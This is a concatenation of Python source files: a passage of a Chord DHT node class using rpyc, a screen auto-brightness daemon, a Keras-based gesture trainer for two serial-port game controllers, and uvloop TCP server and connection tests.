True def get_remote_node(self, ip): if ip not in self.remote_clients: # self.remote_clients[ip] = RPCClient(ip) self.remote_clients[ip] = rpyc.connect(ip, 18861) return self.remote_clients[ip].root """ find the exact successor by comparing the hash(n), can be regarded as a lookup 1. initialize the predecessor and the finger table 2. notify other nodes to update their predecessors and finger tables 3. the new node takes over its responsible keys from its successor. """ def join(self, remote_address=None): # initialize finger table self._finger = [None for x in range(M_BIT)] if remote_address: # 1) add to a node `n`, n.find_successor(`to_be_added`) start = (self.node_id() + (2 ** 0)) % NUM_SLOTS # TODO: replace _remote.getRemoteNode method, start a RPC client instead # remote_node = self._remote.getRemoteNode(remote_address) # find rpc client to remote node remote_node = self.get_remote_node(remote_address) print('remote_node: ', remote_node) # TODO: RPC call find_successor, calling RPC server function # successor = remote_node.find_successor(start) # find remote node by Chord ID # successor = remote_node.find_succ(start) successor = remote_node.find_successor(start) self._finger[0] = FingerEntry(start, successor) # 2) point `to_be_added`’s `successor` to the node found self._successor = successor # 3) copy keys less than `ID(to_be_added)` from the `successor` # self._predecessor = successor._predecessor self._predecessor = successor.predecessor() # update its successor's predecessor # self._successor._predecessor = self self._successor.set_predecessor(self) else: # current node is the first node on the Chord ring self._successor = self # self._finger[0] = FingerEntry(self.id(), self) self._predecessor = self # add other entries in finger table self.init_finger(remote_address) self.fix_finger() self.update_successors() # # 4) call `to_be_added`.stabilize() to update the nodes between `to_be_added` and its predecessor self.stabilize() self.log("joined") # --------------------------------------------- """ first node on circle that succeeds (n + 2^k−1) mod 2m, 1 <= k <= m i-th entry means the 2^i far-away node from the current node """ def init_finger(self, remote_address=None): if remote_address: # get the arbitrary node in which the target node want to join # TODO: _remote.getRemoteNode _remote with RPC client # remote_node = self._remote.getRemoteNode(remote_address) remote_node = self.get_remote_node(remote_address) # first find its successor, i.e. the first entry in its finger table successor = self.successor() if successor is None: # TODO: replace with RPC call find_succ successor = remote_node.find_successor(self.node_id()) self._successor = successor # initialize the rest of its finger table for x in range(1, M_BIT): start_id = (self.node_id() + 2 ** x) % NUM_SLOTS self._finger[x] = FingerEntry(start_id, None) # find the corresponding nodes that are supposed to be in the finger table for x in range(0, M_BIT - 1): start_id = self._finger[x + 1].start if inrange(start_id, self.node_id(), self._finger[x].node.node_id()): # if inrange, no RPC call needed, assign locally self._finger[x + 1].node = self._finger[x].node else: """ need to call find successor leveraging finger table for `self.find_successor`, if its the first node """ successor = self.find_successor(start_id) self._finger[x + 1] = FingerEntry(start_id, successor) else: # n is the only node in the network for x in range(0, M_BIT): start_id = math.floor((self.node_id() + 2 ** x) % NUM_SLOTS) self._finger[x] = FingerEntry(start_id, self) self.print_finger('init_finger') # --------------------------------------------- # called periodically # back-up successor list, a M_BIT-long successor link list def update_successors(self): if self._leave: return successor = self._successor for x in range(M_BIT): if successor is not None: self._successors[x] = successor successor = successor.successor() threading.Timer(2, self.update_successors).start() def node_id(self, offset=0): return self._id def exposed_node_id(self, offset=0): return self._id # for successor other than the node itself, `successor` returns the Netrefs instance of a remote node def successor(self): successor = self._successor print('current successor', self._successor.ping()) if not successor.ping(): for x in range(1, len(self._successors)): if self._successors[x].ping(): successor = self._successors[x] print('current successor', successor.node_id()) return successor def exposed_successor(self): successor = self._successor print('current successor', self._successor.ping()) if not successor.ping(): for x in range(1, len(self._successors)): if self._successors[x].ping(): successor = self._successors[x] print('current successor', successor.node_id()) return successor # for predecessor other than the node itself, `predecessor` returns the Netrefs instance of a remote node def predecessor(self): return self._predecessor def exposed_predecessor(self): return self._predecessor def get_succ_pred_id(self): print('get_succ_pred_id: ', self._successor.node_id(), self._predecessor_id) return (self._successor.node_id(), self._predecessor_id) def exposed_get_succ_pred_id(self): print('exposed_get_succ_pred_id: ', self._successor.node_id(), self._predecessor_id) return (self._successor.node_id(), self._predecessor_id) # set predecessor def set_predecessor(self, node): print('---------set_predecessor------------') print(node.node_id()) self._predecessor_id = node.node_id() # TODO: one thing to note is this may return a Netrefs instance of a remote node, rather than a Node instance def find_successor(self, id): print('---------find_successor--------------') self.log("find_successor of {}".format(id)) # if self._predecessor exists, and _predecessor.id < id < self.id, the successor is current node pre_id = self._predecessor.node_id() self_id = self.node_id() if self._predecessor and inrange(id, pre_id, self_id): return self # TODO: replace `find_predecessor` and `successor` with RPC call return self.find_predecessor(id).successor() def find_predecessor(self, id): lg = "find_predecessor of: {}".format(id) self.log(lg) node = self # when the ring only has one node, node.id is the same as node.successor.id, # if we are alone in the ring, we are the pred(id) if node.node_id() == node.successor().node_id(): return node while not inrange(id, node.node_id(), node.successor().node_id() + 1): node = node._closest_preceding_node(id) return node def _closest_preceding_node(self, id): # from m down to 1 for x in reversed(range(len(self._finger))): entry = self._finger[x] # TODO: replace id method with RPC call, maybe a new method to replace _closest_preceding_node if entry != None and entry.node != None and inrange(entry.node.node_id(), self.node_id(), id): return entry.node return self # used for network visualization application def get_finger(self): finger = [] for x in range(len(self._finger)): if self._finger[x] is not None: finger.append( {'start': self._finger[x].start, 'node': self._finger[x].node.node_id()}) else: finger.append({}) return str(finger) # used for network visualization application def exposed_get_finger(self): return self.get_finger() def update_finger(self, successor, index): if self._finger[index] is not None: if inrange(successor.node_id(), self.node_id() - 1, self._finger[index].node.node_id()): self._finger[index].node = successor # TODO: replace `update_finger` with a RPC call self._predecessor.update_finger(successor, index) # print('finger table of ', self.id(), 'start: ', self._finger[x].start, 'node', self._finger[x].node.id()) # DEPRECATED def update_others(self): for x in range(1, M_BIT + 1): # find last node whose i-th finger might be current node start = (self.node_id() - 2 ** (x - 1)) % NUM_SLOTS """ 2 cases for such invocations: - returns a Node instance when only one node in the network - returns a Netref instance of a remote node """ pre = self.find_predecessor(start) # if only one node on the ring, no need to update others if pre.node_id() == self.node_id(): continue pre.update_finger(self, x) # called periodically # clear the node’s predecessor pointer if n.predecessor is alive, or has failed def check_predecessor(self): if self._leave: return # self.log('check_predecessor, predecessor of {}: , isAlive: {}'.format(self.predecessor().id(), self.predecessor().ping())) pre = self.predecessor() if pre is not None and not pre.ping(): self._predecessor = None threading.Timer(2, self.check_predecessor).start() # called periodically # check its own successor if any new node added between its previous successor def stabilize(self): if self._leave: return # prevent successor failure successor = self.successor() # pre = successor._predecessor pre = successor.predecessor() print('-----------stabilize--------------') pre_id = pre.node_id() self_id = self.node_id() succ_id = successor.node_id() if pre is not None and inrange(pre_id, self_id, succ_id): self.log('stabilize calls update_successor') self.update_successor(pre) print('stabilize successor: ', successor.notify) successor.notify(self) self.print_finger('stabilize') threading.Timer(2, self.stabilize).start() # RPC call # receive request that some node thinks it might be our predecessor def notify(self, pre): # check if pre is the new predecessor if (self._predecessor is None or inrange(pre.node_id(), self._predecessor.node_id(), self.node_id())): self._predecessor = pre def exposed_notify(self, pre): # check if pre is the new predecessor if (self._predecessor is None or inrange(pre.node_id(), self._predecessor.node_id(), self.node_id())): self._predecessor = pre # called periodically # randomly update finger table def fix_finger(self): if self._leave: return self.log('fix_finger') index = random.randrange(M_BIT - 1) + 1 self._finger[index].node = self.find_successor( self._finger[index].start) # self.print_finger('fix_finger') threading.Timer(2, self.fix_finger).start() # update both first entry in finger table and _successor def update_successor(self, new_s): self._successor = new_s self._finger[0].node = new_s def print_finger(self, mod='default'): for x in range(0, M_BIT): if self._finger[x] is not None: self.log('{}: finger table of {}, start: {}, node: {}'.format( mod, self.node_id(), self._finger[x].start, self._finger[x].node.node_id())) # if __name__ == "__main__": # thread = ThreadedServer(RPC(self), hostname='0.0.0.0', port=18861, protocol_config={ # 'allow_all_attrs': True # }) # self._thread = threading.Thread(target=thread.start) # self._thread.start() # print('RPC server started...')
daemon.py
from autobrightness import brightness import keyboard import time import Xlib.display from threading import Thread class Daemon: """ Background service Parameters: settings: config object lang: gettext object """ def __init__(self, settings, lang): global _ _ = lang.gettext print(_("Starting daemon...")) self.brightness = brightness.Brightness(settings, lang) self.interval = settings.interval self.shortcut = settings.shortcut self.fullscreen = False if settings.fullscreen == 1: self.fullscreen = True self.startup = False if settings.startup == 1: self.startup = True def shortcutEvent(self, e = None): """ Shortcut keypress event """ print(_("Shortcut key used.")) self.setBrightness() def addSchortcut(self, shortcut): """ Add shortcut to keyboard event Parameters: shortcut (str|int): key combination or scancode """ if type(shortcut) == str: keyboard.add_hotkey(shortcut, self.shortcutEvent) else: keyboard.on_press_key(shortcut, self.shortcutEvent) def setBrightness(self): """ Calculate and set screen brightness """ self.brightness.set( self.brightness.calculate() ) def start(self): """ Start the daemon """ if self.fullscreen: fullscreenThread = Thread(target=self._fullScreenCheck) fullscreenThread.start() if self.startup: self.setBrightness() if not self.shortcut is None: self.addSchortcut(self.shortcut) while True: if self.interval > 0: time.sleep( self.interval ) self.setBrightness() elif not self.shortcut is None: time.sleep(1) else: print(_("No interval nor shortcut selected. ")) break def _fullscreenCount(self): """ Returns fullscreen window count https://stackoverflow.com/a/1360522 """ screen = Xlib.display.Display().screen() num_of_fs = 0 for window in screen.root.query_tree()._data['children']: try: width = window.get_geometry()._data["width"] height = window.get_geometry()._data["height"] except Exception: width = 0 height = 0 if width == screen.width_in_pixels and height == screen.height_in_pixels: num_of_fs += 1 return num_of_fs def _fullScreenCheck(self): print(_("Full screen check activated.")) fullscreenCount = self._fullscreenCount() fullscreenMode = False while True: if not fullscreenMode: oldBrightness = self.brightness.screen.getBrightness() # full screen window count increase means a full screen window is on screen if self._fullscreenCount() > fullscreenCount and self.brightness.screen.getBrightness() != self.brightness.screen.maxBrightness: print(_("Detected full screen mode")) fullscreenMode = True self.brightness.set( self.brightness.screen.maxBrightness ) # get back to old brightness value if self._fullscreenCount() == fullscreenCount and fullscreenMode: print(_("Exiting from full screen mode")) fullscreenMode = False self.brightness.set(oldBrightness) time.sleep(.5)
MCHandleTrainer.py
from tkinter import * from tkinter import messagebox from keras.layers import Dense from keras.models import Sequential, load_model import tensorflow as tf import serial import serial.tools.list_ports import threading from PIL import Image, ImageDraw, ImageTk import numpy as np import time import multiprocessing import queue from host.BaseComm import BaseComm from host.ui_logger import UiLogger class MCHandleTrainer: ACTION_NONE = '无动作' ACTION_FORWARD = '前进' ACTION_JUMP = '起跳' ACTION_DOWN = '下降' ACTION_HIT = '打击' ACTION_PUT = '放置' ACTIONS = [ACTION_NONE, ACTION_FORWARD, ACTION_JUMP, ACTION_DOWN, ACTION_HIT, ACTION_PUT] def __init__(self, root=None): self.init_top = Tk() self.port_left = 'COM4' self.port_right = 'COM5' self.init_bps = StringVar() self.init_bps.set('115200') self.init_com_left = StringVar() self.init_com_left.set(self.port_left) self.init_com_right = StringVar() self.init_com_right.set(self.port_right) self.init_communication() self.bps = 115200 self.comm = None self.n = 512 self.select = 24 self.frames = [[0 for i in range(12)] for j in range(self.n)] self.raw = [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] for j in range(self.n)] # 建立网络 self.model_file = 'mc_actions.h5' # 建立网络的过程放在线程2 # self.model = model # print(self.model.get_config()) self.comm_left = BaseComm(self.init_com_left.get(), self.bps) self.comm_right = BaseComm(self.init_com_right.get(), self.bps) self.root = root if self.root is None: self.root = Tk() self.root.title("MC手柄训练器") self.panel = Label(self.root) self.panel.pack(side=TOP, expand=1, fill=X) frame = Frame(self.root) Button(frame, text='切换模式', command=self.predict_mode).grid(row=1, column=1, sticky=W + E) Button(frame, text='前进', command=self.action_forward).grid(row=1, column=2, sticky=W + E) Button(frame, text='上跳', command=self.action_jump).grid(row=1, column=3, sticky=W + E) Button(frame, text='下降', command=self.action_down).grid(row=1, column=4, sticky=W + E) Button(frame, text='打击', command=self.action_hit).grid(row=1, column=5, sticky=W + E) Button(frame, text='放置', command=self.action_put).grid(row=1, column=6, sticky=W + E) Button(frame, text='无动作', command=self.action_none).grid(row=1, column=7, sticky=W + E) Button(frame, text='保存模型', command=self.save_model).grid(row=1, column=8, sticky=W + E) Label(frame, text='正在训练:').grid(row=1, column=9, sticky=W + E) self.var_training = StringVar() self.var_training.set('...') Label(frame, textvariable=self.var_training).grid(row=1, column=10, sticky=W + E) frame.pack(side=BOTTOM, expand=1, fill=X) self.logger_test = UiLogger(self.root, title='程序日志', simplify=False, height=10) self.logger_test.logger().pack(side=BOTTOM, expand=1, fill=X) self.lock = threading.Lock() self.training = self.ACTION_NONE self.will_save_model = False self.train_mode = True self.t1 = 0 self.t2 = 0 t = threading.Thread(target=self.read_thread) t.setDaemon(True) t.start() t = threading.Thread(target=self.parse_thread) t.setDaemon(True) t.start() def predict_mode(self): if self.train_mode is True: self.train_mode = False self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_WARNING, 'switch', '切换到预测模式')) self.t2 = 0 else: self.train_mode = True self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_WARNING, 'switch', '切换到训练模式')) self.t2 = 0 def action_forward(self): if self.training == self.ACTION_FORWARD: self.training = self.ACTION_NONE else: self.training = self.ACTION_FORWARD def action_jump(self): if self.training == self.ACTION_JUMP: self.training = self.ACTION_NONE else: self.training = self.ACTION_JUMP def action_down(self): if self.training == self.ACTION_DOWN: self.training = self.ACTION_NONE else: self.training = self.ACTION_DOWN def action_hit(self): if self.training == self.ACTION_HIT: self.training = self.ACTION_NONE else: self.training = self.ACTION_HIT def action_put(self): if self.training == self.ACTION_PUT: self.training = self.ACTION_NONE else: self.training = self.ACTION_PUT def action_none(self): self.training = self.ACTION_NONE def save_model(self): self.will_save_model = True def init_communication(self): top = self.init_top frame = LabelFrame(top, text="连接设置") Label(frame, text="左手柄").grid(row=1, column=1) Entry(frame, textvariable=self.init_com_left).grid(row=1, column=2) Label(frame, text="右手柄").grid(row=2, column=1) Entry(frame, textvariable=self.init_com_right).grid(row=2, column=2) Label(frame, text="波特率").grid(row=3, column=1) Entry(frame, textvariable=self.init_bps).grid(row=3, column=2) frame.grid(row=1, columnspan=3, column=1) Button(top, text="测试", command=self.init_communication_test).grid(row=2, column=1, sticky=W+E) Button(top, text="刷新", command=self.init_communication_refresh).grid(row=2, column=2, sticky=W+E) Button(top, text="确定", command=self.init_communication_ok).grid(row=2, column=3, sticky=W+E) top.mainloop() def init_communication_ok(self): try: bps = int(self.init_bps.get()) except ValueError: messagebox.showerror("错误", '数值错误!') return self.bps = bps self.port_left = self.init_com_left.get() self.port_right = self.init_com_right.get() if self.init_communication_test(show=False) is False: messagebox.showerror("错误", '手柄测试不通过!') return self.init_top.destroy() def mainloop(self): self.root.mainloop() def init_communication_test(self, show=True): try: bps = int(self.init_bps.get()) except ValueError: messagebox.showerror("错误", '数值错误!') return res = True print('测试左手柄') comm = BaseComm(self.init_com_left.get(), bps) if not comm.test(): if show is True: messagebox.showerror("错误", '测试左手柄失败') res = False comm.close() print('测试右手柄') comm = BaseComm(self.init_com_right.get(), bps) if not comm.test(): if show is True: messagebox.showerror("错误", '测试右手柄失败') res = False comm.close() return res def init_communication_refresh(self): pass # 单个手柄数据读取 def read_data(self, comm: BaseComm, q: queue.Queue): q.put(comm.read1epoch()) # 第二个线程,负责读取 def read_thread(self): while True: time.sleep(0.01) q_left = queue.Queue() q_right = queue.Queue() # data_left = self.comm_left.read1epoch() # data_right = self.comm_right.read1epoch() thread_left = threading.Thread(target=self.read_data, args=(self.comm_left, q_left)) thread_right = threading.Thread(target=self.read_data, args=(self.comm_right, q_right)) thread_left.setDaemon(True) thread_right.setDaemon(True) thread_left.start() thread_right.start() thread_left.join(5) thread_right.join(5) if q_left.empty() or q_right.empty(): print('WARING: 数据读取失败!') continue data_left = q_left.get() data_right = q_right.get() self.lock.acquire() self.raw.append([data_left, data_right]) if len(self.raw) > self.n: self.raw = self.raw[1:-1] self.lock.release() # frames添加数据 ann = data_left[0:6] ann.extend(data_right[0:6]) self.lock.acquire() self.frames.append(ann) if len(self.frames) > self.n: self.frames = self.frames[1:-1] self.lock.release() # print('ANN DATA:', ann) def parse_thread(self): # 建模 try: model = load_model(self.model_file) except OSError: print("Can't find", self.model_file) model = Sequential() model.add(Dense(self.select * 12, activation='tanh', input_dim=self.select * 12)) model.add(Dense(self.select * 24, activation='tanh')) model.add(Dense(self.select * 32, activation='tanh')) model.add(Dense(self.select * 48, activation='tanh')) model.add(Dense(self.select * 32, activation='tanh')) model.add(Dense(self.select * 24, activation='tanh')) model.add(Dense(self.select * 12, activation='tanh')) model.add(Dense(self.select, activation='tanh')) model.add(Dense(6, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='adam') start = time.time() while True: self.var_training.set(self.training) # 只需要MPU数据 self.lock.acquire() data_left = self.raw[-1][0][:6] data_right = self.raw[-1][1][:6] self.lock.release() # data_left = self.comm_left.read1epoch()[:6] # data_right = self.comm_right.read1epoch()[:6] # print(data) data = data_left data.extend(data_right) # print(data) # self.lock.acquire() # self.frames.append(data) # if len(self.frames) > self.n: # self.frames = self.frames[1:-1] # self.lock.release() if self.t1 == 5: im = self.draw() imp = ImageTk.PhotoImage(image=im) self.panel.configure(image=imp) self.panel.image = imp self.t1 = 0 self.t1 += 1 # 开始训练 if self.t2 == 5 and self.train_mode is True: self.lock.acquire() x = np.array(self.frames[len(self.frames) - self.select:]) self.lock.release() x = x.reshape((1, x.size)) # print('X shape:', x.shape) one = [0 for i in range(6)] one[self.ACTIONS.index(self.training)] = 1 y = np.array(one) y = y.reshape((1, 6)) # print('Y shape:', y.shape) self.t2 = 0 res = model.train_on_batch(x=x, y=y) # print('train:', res) self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'training', '%s' % res)) self.t2 += 1 if self.will_save_model is True: print('保存模型...') self.lock.acquire() model.save(self.model_file) self.will_save_model = False self.lock.release() # 预测模式 if self.t2 == 5 and self.train_mode is False: self.t2 = 0 self.lock.acquire() x = np.array(self.frames[len(self.frames) - self.select:]) self.lock.release() x = x.reshape((1, x.size)) # print('X shape:', x.shape) # res = model.train_on_batch(x=x, y=y) predict = model.predict(x=x)[0] predict = predict.tolist() res = predict.index(max(predict)) res = self.ACTIONS[res] # print('predict:', res) self.logger_test.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'predict %.2f' % (time.time() - start), '%s' % res)) def draw(self): width = 1 height = 32 colors = [ 'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple', 'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple', ] size = (width * self.n, height * 6) im = Image.new("RGB", size, color='white') draw = ImageDraw.Draw(im) for i in range(self.n - 2): for j in range(12): draw.line((width * i, self.frames[i][j] + size[1] / 2, width * (i + 1), self.frames[i + 1][j] + size[1] / 2), fill=colors[j]) sx = size[0] - width * self.select draw.line((sx, 0, sx, size[1]), fill='red') return im if __name__ == '__main__': multiprocessing.freeze_support() _trainer = MCHandleTrainer() # _trainer.init_communication() _trainer.mainloop()
test_tcp.py
import asyncio import asyncio.sslproto import gc import os import select import socket import unittest.mock import uvloop import ssl import sys import threading import time import weakref from OpenSSL import SSL as openssl_ssl from uvloop import _testbase as tb class MyBaseProto(asyncio.Protocol): connected = None done = None def __init__(self, loop=None): self.transport = None self.state = 'INITIAL' self.nbytes = 0 if loop is not None: self.connected = asyncio.Future(loop=loop) self.done = asyncio.Future(loop=loop) def connection_made(self, transport): self.transport = transport assert self.state == 'INITIAL', self.state self.state = 'CONNECTED' if self.connected: self.connected.set_result(None) def data_received(self, data): assert self.state == 'CONNECTED', self.state self.nbytes += len(data) def eof_received(self): assert self.state == 'CONNECTED', self.state self.state = 'EOF' def connection_lost(self, exc): assert self.state in ('CONNECTED', 'EOF'), self.state self.state = 'CLOSED' if self.done: self.done.set_result(None) class _TestTCP: def test_create_server_1(self): if self.is_asyncio_loop() and sys.version_info[:3] == (3, 5, 2): # See https://github.com/python/asyncio/pull/366 for details. raise unittest.SkipTest() CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 5.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') data = await reader.readexactly(len(B_DATA)) self.assertEqual(data, B_DATA) writer.writelines([b'S', b'P']) writer.write(bytearray(b'A')) writer.write(memoryview(b'M')) if self.implementation == 'uvloop': tr = writer.transport sock = tr.get_extra_info('socket') self.assertTrue( sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)) await writer.drain() writer.close() CNT += 1 async def test_client(addr): sock = socket.socket() with sock: sock.setblocking(False) await self.loop.sock_connect(sock, addr) await self.loop.sock_sendall(sock, A_DATA) buf = b'' while len(buf) != 2: buf += await self.loop.sock_recv(sock, 1) self.assertEqual(buf, b'OK') await self.loop.sock_sendall(sock, B_DATA) buf = b'' while len(buf) != 4: buf += await self.loop.sock_recv(sock, 1) self.assertEqual(buf, b'SPAM') self.assertEqual(sock.fileno(), -1) self.assertEqual(sock._io_refs, 0) self.assertTrue(sock._closed) async def start_server(): nonlocal CNT CNT = 0 addrs = ('127.0.0.1', 'localhost') if not isinstance(self.loop, uvloop.Loop): # Hack to let tests run on Python 3.5.0 # (asyncio doesn't support multiple hosts in 3.5.0) addrs = '127.0.0.1' srv = await asyncio.start_server( handle_client, addrs, 0, family=socket.AF_INET, loop=self.loop) srv_socks = srv.sockets self.assertTrue(srv_socks) if self.has_start_serving(): self.assertTrue(srv.is_serving()) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) self.loop.call_soon(srv.close) await srv.wait_closed() # Check that the server cleaned-up proxy-sockets for srv_sock in srv_socks: self.assertEqual(srv_sock.fileno(), -1) if self.has_start_serving(): self.assertFalse(srv.is_serving()) async def start_server_sock(): nonlocal CNT CNT = 0 sock = socket.socket() sock.bind(('127.0.0.1', 0)) addr = sock.getsockname() srv = await asyncio.start_server( handle_client, None, None, family=socket.AF_INET, loop=self.loop, sock=sock) if self.PY37: self.assertIs(srv.get_loop(), self.loop) srv_socks = srv.sockets self.assertTrue(srv_socks) if self.has_start_serving(): self.assertTrue(srv.is_serving()) tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) srv.close() await srv.wait_closed() # Check that the server cleaned-up proxy-sockets for srv_sock in srv_socks: self.assertEqual(srv_sock.fileno(), -1) if self.has_start_serving(): self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) self.loop.run_until_complete(start_server_sock()) self.assertEqual(CNT, TOTAL_CNT) def test_create_server_2(self): with self.assertRaisesRegex(ValueError, 'nor sock were specified'): self.loop.run_until_complete(self.loop.create_server(object)) def test_create_server_3(self): ''' check ephemeral port can be used ''' async def start_server_ephemeral_ports(): for port_sentinel in [0, None]: srv = await self.loop.create_server( asyncio.Protocol, '127.0.0.1', port_sentinel, family=socket.AF_INET) srv_socks = srv.sockets self.assertTrue(srv_socks) if self.has_start_serving(): self.assertTrue(srv.is_serving()) host, port = srv_socks[0].getsockname() self.assertNotEqual(0, port) self.loop.call_soon(srv.close) await srv.wait_closed() # Check that the server cleaned-up proxy-sockets for srv_sock in srv_socks: self.assertEqual(srv_sock.fileno(), -1) if self.has_start_serving(): self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server_ephemeral_ports()) def test_create_server_4(self): sock = socket.socket() sock.bind(('127.0.0.1', 0)) with sock: addr = sock.getsockname() with self.assertRaisesRegex(OSError, r"error while attempting.*\('127.*: " r"address already in use"): self.loop.run_until_complete( self.loop.create_server(object, *addr)) def test_create_server_5(self): # Test that create_server sets the TCP_IPV6ONLY flag, # so it can bind to ipv4 and ipv6 addresses # simultaneously. port = tb.find_free_port() async def runner(): srv = await self.loop.create_server( asyncio.Protocol, None, port) srv.close() await srv.wait_closed() self.loop.run_until_complete(runner()) def test_create_server_6(self): if not hasattr(socket, 'SO_REUSEPORT'): raise unittest.SkipTest( 'The system does not support SO_REUSEPORT') if sys.version_info[:3] < (3, 5, 1): raise unittest.SkipTest( 'asyncio in CPython 3.5.0 does not have the ' 'reuse_port argument') port = tb.find_free_port() async def runner(): srv1 = await self.loop.create_server( asyncio.Protocol, None, port, reuse_port=True) srv2 = await self.loop.create_server( asyncio.Protocol, None, port, reuse_port=True) srv1.close() srv2.close() await srv1.wait_closed() await srv2.wait_closed() self.loop.run_until_complete(runner()) def test_create_server_7(self): # Test that create_server() stores a hard ref to the server object # somewhere in the loop. In asyncio it so happens that # loop.sock_accept() has a reference to the server object so it # never gets GCed. class Proto(asyncio.Protocol): def connection_made(self, tr): self.tr = tr self.tr.write(b'hello') async def test(): port = tb.find_free_port() srv = await self.loop.create_server(Proto, '127.0.0.1', port) wsrv = weakref.ref(srv) del srv gc.collect() gc.collect() gc.collect() s = socket.socket(socket.AF_INET) with s: s.setblocking(False) await self.loop.sock_connect(s, ('127.0.0.1', port)) d = await self.loop.sock_recv(s, 100) self.assertEqual(d, b'hello') srv = wsrv() srv.close() await srv.wait_closed() del srv # Let all transports shutdown. await asyncio.sleep(0.1, loop=self.loop) gc.collect() gc.collect() gc.collect() self.assertIsNone(wsrv()) self.loop.run_until_complete(test()) def test_create_server_8(self): if self.implementation == 'asyncio' and not self.PY37: raise unittest.SkipTest() with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful'): self.loop.run_until_complete( self.loop.create_server( lambda: None, host='::', port=0, ssl_handshake_timeout=10)) def test_create_server_9(self): if not self.has_start_serving(): raise unittest.SkipTest() async def handle_client(reader, writer): pass async def start_server(): srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop, start_serving=False) await srv.start_serving() self.assertTrue(srv.is_serving()) # call start_serving again await srv.start_serving() self.assertTrue(srv.is_serving()) srv.close() await srv.wait_closed() self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server()) def test_create_server_10(self): if not self.has_start_serving(): raise unittest.SkipTest() async def handle_client(reader, writer): pass async def start_server(): srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop, start_serving=False) async with srv: fut = asyncio.ensure_future(srv.serve_forever(), loop=self.loop) await asyncio.sleep(0, loop=self.loop) self.assertTrue(srv.is_serving()) fut.cancel() with self.assertRaises(asyncio.CancelledError): await fut self.assertFalse(srv.is_serving()) self.loop.run_until_complete(start_server()) def test_create_connection_open_con_addr(self): async def client(addr): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) writer.write(b'AAAA') self.assertEqual(await reader.readexactly(2), b'OK') re = r'(a bytes-like object)|(must be byte-ish)' with self.assertRaisesRegex(TypeError, re): writer.write('AAAA') writer.write(b'BBBB') self.assertEqual(await reader.readexactly(4), b'SPAM') if self.implementation == 'uvloop': tr = writer.transport sock = tr.get_extra_info('socket') self.assertTrue( sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)) writer.close() self._test_create_connection_1(client) def test_create_connection_open_con_sock(self): async def client(addr): sock = socket.socket() sock.connect(addr) reader, writer = await asyncio.open_connection( sock=sock, loop=self.loop) writer.write(b'AAAA') self.assertEqual(await reader.readexactly(2), b'OK') writer.write(b'BBBB') self.assertEqual(await reader.readexactly(4), b'SPAM') if self.implementation == 'uvloop': tr = writer.transport sock = tr.get_extra_info('socket') self.assertTrue( sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)) writer.close() self._test_create_connection_1(client) def _test_create_connection_1(self, client): CNT = 0 TOTAL_CNT = 100 def server(sock): data = sock.recv_all(4) self.assertEqual(data, b'AAAA') sock.send(b'OK') data = sock.recv_all(4) self.assertEqual(data, b'BBBB') sock.send(b'SPAM') async def client_wrapper(addr): await client(addr) nonlocal CNT CNT += 1 def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) run(client_wrapper) def test_create_connection_2(self): sock = socket.socket() with sock: sock.bind(('127.0.0.1', 0)) addr = sock.getsockname() async def client(): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) async def runner(): with self.assertRaises(ConnectionRefusedError): await client() self.loop.run_until_complete(runner()) def test_create_connection_3(self): CNT = 0 TOTAL_CNT = 100 def server(sock): data = sock.recv_all(4) self.assertEqual(data, b'AAAA') sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) writer.write(b'AAAA') with self.assertRaises(asyncio.IncompleteReadError): await reader.readexactly(10) writer.close() nonlocal CNT CNT += 1 def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) run(client) def test_create_connection_4(self): sock = socket.socket() sock.close() async def client(): reader, writer = await asyncio.open_connection( sock=sock, loop=self.loop) async def runner(): with self.assertRaisesRegex(OSError, 'Bad file'): await client() self.loop.run_until_complete(runner()) def test_create_connection_5(self): def server(sock): try: data = sock.recv_all(4) except ConnectionError: return self.assertEqual(data, b'AAAA') sock.send(b'OK') async def client(addr): fut = asyncio.ensure_future( self.loop.create_connection(asyncio.Protocol, *addr), loop=self.loop) await asyncio.sleep(0, loop=self.loop) fut.cancel() with self.assertRaises(asyncio.CancelledError): await fut with self.tcp_server(server, max_clients=1, backlog=1) as srv: self.loop.run_until_complete(client(srv.addr)) 